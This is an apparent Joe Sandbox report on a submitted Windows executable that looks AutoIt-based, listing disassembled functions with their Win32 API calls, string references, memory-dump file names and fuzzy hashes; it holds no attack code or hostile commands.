Instruction ID: f0b2e9d98af4567a7baa2e0ecd844b76245ed120515454e76a03ee536ecbe402
Opcode Fuzzy Hash: 9f25f3a56b0266691016f3497808fc43364964fe3119613ae0760035d9d8356b
Instruction Fuzzy Hash: 51210737248200BBEB255B79AC89E7F7B9CDF4A750F01413AF806DA261EF71EC419660

Function 0020B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00182612: GetWindowLongW.USER32(?,000000EB), ref: 00182623

GetWindowLongW.USER32(?,000000F0), ref: 0020B192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0020B1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0020B1CF
GetSystemMetrics.USER32(00000004), ref: 0020B1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,001F0E90,00000000), ref: 0020B216

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 2f1ea49387738ce4e868f90582082ee205d2134fdc3db8e3ca3334c957927b25
Instruction ID: 2e7d0ba89c9b3a37ac9f395571810558c51834c21b56d443d494ea519aa8e519
Opcode Fuzzy Hash: 2f1ea49387738ce4e868f90582082ee205d2134fdc3db8e3ca3334c957927b25
Instruction Fuzzy Hash: DE217171970762AFCB219F389C18A6A7BA4FB15721F104634AD26D75E2E73098608B90

Function 001D9307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 001D9320

Part of subcall function 00187BCC: _memmove.LIBCMT ref: 00187C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 001D9352
__itow.LIBCMT ref: 001D936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 001D9392
__itow.LIBCMT ref: 001D93A3

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: f6b4825297194071182da7475d04cd9991657d8c1a295b26b26dac148b25e62c
Instruction ID: 7eb425b9bcc8f9e04a0d7add0e37389fbadd608778c3814332462fada310d437
Opcode Fuzzy Hash: f6b4825297194071182da7475d04cd9991657d8c1a295b26b26dac148b25e62c
Instruction Fuzzy Hash: B121D431700308BBDB20AA759C89EAE7BADFB99710F144026F905DB2D1D7B0CE519B91

Function 001F5A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 001F5A6E
GetForegroundWindow.USER32 ref: 001F5A85
GetDC.USER32(00000000), ref: 001F5AC1
GetPixel.GDI32(00000000,?,00000003), ref: 001F5ACD
ReleaseDC.USER32(00000000,00000003), ref: 001F5B08

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 1e254d53b16f2c51c25c63f5faa2a8e9e109b498d720a0caf0e21d97ba029a95
Instruction ID: df1de86a0db8a9b1283082d033a072803569dceb17937ff48080b1dfe722ae5e
Opcode Fuzzy Hash: 1e254d53b16f2c51c25c63f5faa2a8e9e109b498d720a0caf0e21d97ba029a95
Instruction Fuzzy Hash: 7321C635A00604AFDB54EF65DD88A6AB7E9EF58310F148079F919D7762CB70AD00CB90

Function 001812F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0018134D
SelectObject.GDI32(?,00000000), ref: 0018135C
BeginPath.GDI32(?), ref: 00181373
SelectObject.GDI32(?,00000000), ref: 0018139C

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: a9f9b7664e2fca625f3f9462357c9fc0e15c058ae74e0b538197573604050731
Instruction ID: 2df8d8214c78dd20cb1298eb1c69377d221131f760d5ef1d12996f65924c4f9a
Opcode Fuzzy Hash: a9f9b7664e2fca625f3f9462357c9fc0e15c058ae74e0b538197573604050731
Instruction Fuzzy Hash: 3021AC36800B18EBDB10AF24FD487A93BE9FB01721F144226F844964B2DB708A92CF80

Function 001DBC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 001DBCB3
_memcmp.LIBCMT ref: 001DBCD1
_memcmp.LIBCMT ref: 001DBCE4
_memcmp.LIBCMT ref: 001DBCFC
_memcmp.LIBCMT ref: 001DBD14

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 67813fa277bd718212c0b96271fd9ff91adf23f6f0efa5acbf60e3b8c386c5b6
Instruction ID: a3c24dc4832e4a7ddfd02570477be843f5c13100cb6de7ad391d6855cdee95c1
Opcode Fuzzy Hash: 67813fa277bd718212c0b96271fd9ff91adf23f6f0efa5acbf60e3b8c386c5b6
Instruction Fuzzy Hash: 6401B971618105FBD20466255DC2FFBB35CEF36398F064022FD0696342EB50DE24C2A4

Function 001E4A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 001E4ABA
__beginthreadex.LIBCMT ref: 001E4AD8
MessageBoxW.USER32(?,?,?,?), ref: 001E4AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 001E4B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 001E4B0A

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: b86b466ae326e5e498e8656732967e1d87bd66e1ae63d487a0f65c87941eb66b
Instruction ID: 865e9b91b0ed6b53a93fd9cd21331b22b3c9cad1246f8364aae6312ab7ef7920
Opcode Fuzzy Hash: b86b466ae326e5e498e8656732967e1d87bd66e1ae63d487a0f65c87941eb66b
Instruction Fuzzy Hash: B311A576905A54BBC7119FB9AC0CA9E7BACAB45321F144266F824D3252D7B1894487A0

Function 001D8202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001D821E
GetLastError.KERNEL32(?,001D7CE2,?,?,?), ref: 001D8228
GetProcessHeap.KERNEL32(00000008,?,?,001D7CE2,?,?,?), ref: 001D8237
HeapAlloc.KERNEL32(00000000,?,001D7CE2,?,?,?), ref: 001D823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001D8255

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: de1318c17ede0dd30edc0433a10c50992e75ad58f142a41ee3ab07069ebcee04
Instruction ID: f8cbffd201bbc630e11314636b195fe1e2bdfcc27358321cbf770d379e7aeca6
Opcode Fuzzy Hash: de1318c17ede0dd30edc0433a10c50992e75ad58f142a41ee3ab07069ebcee04
Instruction Fuzzy Hash: AA016D71240304BFDB208FA5ED4DD6B7BBCEF8A754B50046AF809C2221DB329C00CA60

Function 001D710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001D7044,80070057,?,?,?,001D7455), ref: 001D7127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001D7044,80070057,?,?), ref: 001D7142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001D7044,80070057,?,?), ref: 001D7150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001D7044,80070057,?), ref: 001D7160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001D7044,80070057,?,?), ref: 001D716C

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: e3a349efb5ef150f85accbf6b5486f9dba19ec9d0a8d0f3bb807014f1da88781
Instruction ID: 73e02298a40d71dc85802e919a0affc2ebffd7078b4e4137fd48ba822e6d18ab
Opcode Fuzzy Hash: e3a349efb5ef150f85accbf6b5486f9dba19ec9d0a8d0f3bb807014f1da88781
Instruction Fuzzy Hash: 69018FB2601314BBDB218F64ED88BAABBBDEF447A1F144265FD04D2361E731DD409BA0

Function 001E5244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 001E5260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 001E526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 001E5276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 001E5280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 001E52BC

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 8b7eaf943ce94cf7f1229c779c39adf50eaa6fa4ecd04447b81fd1dfabaaefe8
Instruction ID: c8011cc4b35f0856343da3ef812772c12d54294e76d63112124a47eea235e21a
Opcode Fuzzy Hash: 8b7eaf943ce94cf7f1229c779c39adf50eaa6fa4ecd04447b81fd1dfabaaefe8
Instruction Fuzzy Hash: CC015731D01A1ADBCF14EFE5E98C9EDFB79BB08315F410056EA46B2141CB3095508BA1

Function 001D810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 001D8121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 001D812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001D813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 001D8141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001D8157

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 4e967ffc48b91605fce4c1d87fb85eb009dfc4e5011aa6886b270aae02021216
Instruction ID: b88a2c024253888c866d511fa72c43d38fc0eaa2c0d9b2c90de0965a61c276c9
Opcode Fuzzy Hash: 4e967ffc48b91605fce4c1d87fb85eb009dfc4e5011aa6886b270aae02021216
Instruction Fuzzy Hash: B2F06271240314AFEB610FA5EC8DF673BADFF49758B000026F949C6251CB619D45DA60

Function 001DC1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 001DC1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 001DC20E
MessageBeep.USER32(00000000), ref: 001DC226
KillTimer.USER32(?,0000040A), ref: 001DC242
EndDialog.USER32(?,00000001), ref: 001DC25C

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 7e86b853c8afac4043eb9e68416fbac517b9a8b5ee3980d68dd4a7b657d627e3
Instruction ID: c5d7a0461407a8e1961250a22cc7114199675868a1230f1f348850ee04387471
Opcode Fuzzy Hash: 7e86b853c8afac4043eb9e68416fbac517b9a8b5ee3980d68dd4a7b657d627e3
Instruction Fuzzy Hash: F201A73044430597EB355B50ED4EB96777CBB00705F04066AE552919E1D7E16944CB90

Function 001813B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 001813BF
StrokeAndFillPath.GDI32(?,?,001BB888,00000000,?), ref: 001813DB
SelectObject.GDI32(?,00000000), ref: 001813EE
DeleteObject.GDI32 ref: 00181401
StrokePath.GDI32(?), ref: 0018141C

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: a3138bfeb5acdf9966711e3849091eda1cb2fc2ad9346a33e499d10b02b38b7b
Instruction ID: 4e2dc47639e9a9734392a9f26b7012f86df90ee51001b5d2f7f254eb5b7b432e
Opcode Fuzzy Hash: a3138bfeb5acdf9966711e3849091eda1cb2fc2ad9346a33e499d10b02b38b7b
Instruction Fuzzy Hash: 53F0CD35044B18EBDB655F16FD4C7583BE9A702726F088224E469494F2CB314596DF50

Function 00192CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 001A0DB6: std::exception::exception.LIBCMT ref: 001A0DEC
Part of subcall function 001A0DB6: __CxxThrowException@8.LIBCMT ref: 001A0E01

Part of subcall function 00187DE1: _memmove.LIBCMT ref: 00187E22

Part of subcall function 00187A51: _memmove.LIBCMT ref: 00187AAB

__swprintf.LIBCMT ref: 00192ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00192D66

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 815dac422f27a1c208790d1e24b8a835131489724a1fd1215323f46c2b63c956
Instruction ID: 917ce22d4d672654e8d28f05a272497140821c681ab73b35b6da096b53b9694c
Opcode Fuzzy Hash: 815dac422f27a1c208790d1e24b8a835131489724a1fd1215323f46c2b63c956
Instruction Fuzzy Hash: 65916C71608201AFCB18FF28C885D6FB7A5EFA5710F14491DF4969B2A1EB30EE44CB52

Function 001EB93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00184750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00184743,?,?,001837AE,?), ref: 00184770

CoInitialize.OLE32(00000000), ref: 001EB9BB
CoCreateInstance.OLE32(00212D6C,00000000,00000001,00212BDC,?), ref: 001EB9D4
CoUninitialize.OLE32 ref: 001EB9F1

Part of subcall function 00189837: __itow.LIBCMT ref: 00189862
Part of subcall function 00189837: __swprintf.LIBCMT ref: 001898AC

Strings

.lnk, xrefs: 001EB99D, 001EB9AB

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 7065c044f96f1293ea65f51305660975ad27bd4ffa6a742bd56da38c1fb173fe
Instruction ID: baa25050eaa91dfe19d6e1cf0dcca682362a76737c2c8bbf2a664b7f05097004
Opcode Fuzzy Hash: 7065c044f96f1293ea65f51305660975ad27bd4ffa6a742bd56da38c1fb173fe
Instruction Fuzzy Hash: A3A145756043459FCB00EF15C884D6ABBE5FF89318F148958F8999B3A1CB31ED45CB91

Function 001DB2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 001DB4BE

Strings

AutoIt3GUI, xrefs: 001DB436
Container, xrefs: 001DB43B
%!, xrefs: 001DB561

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container$%!
API String ID: 3565006973-3188250632
Opcode ID: 5dc407333f720a3a43814db789cf1745a85aec9fd7fca55fafebf5090fc48510
Instruction ID: 4d52331f439ec0b0224b2fad7503dc95bd0c2ead67b67735fd3cb426f207b64f
Opcode Fuzzy Hash: 5dc407333f720a3a43814db789cf1745a85aec9fd7fca55fafebf5090fc48510
Instruction Fuzzy Hash: 539138B1604601EFDB14DF64D884A6ABBE5FF49710F21856EF94ACB391DB70E841CB50

Function 001A501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 001A50AD

Part of subcall function 001B00F0: __87except.LIBCMT ref: 001B012B

Strings

pow, xrefs: 001A5085, 001A50A2

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 88df6092c4124a7df57d1f7d4e655f9b5d561d3cdd530e5f509d3d05d1b3d007
Instruction ID: 912a69bff7b9cabd4b3e7de28e4d07bdcb9054992f0f8bf5cca32bf4f37cd0b0
Opcode Fuzzy Hash: 88df6092c4124a7df57d1f7d4e655f9b5d561d3cdd530e5f509d3d05d1b3d007
Instruction Fuzzy Hash: 3F518E6590C60186DB1AB728DA053FF2BA59F56700F208D99F4D5862A9EF34CDC896C2

Function 00196192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00196248
_memmove.LIBCMT ref: 001962E4
_memset.LIBCMT ref: 00196308

Strings

ERCP, xrefs: 001961B3

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: ab8a40620d22f266d203ad9c3ec758681fa09030fbfbf8f7c5d5fceb8204f7f5
Instruction ID: f4d1f9a3f4574f29dbe8458bca0a7a012e3f1768aa09f1babae6ca598ff9bf70
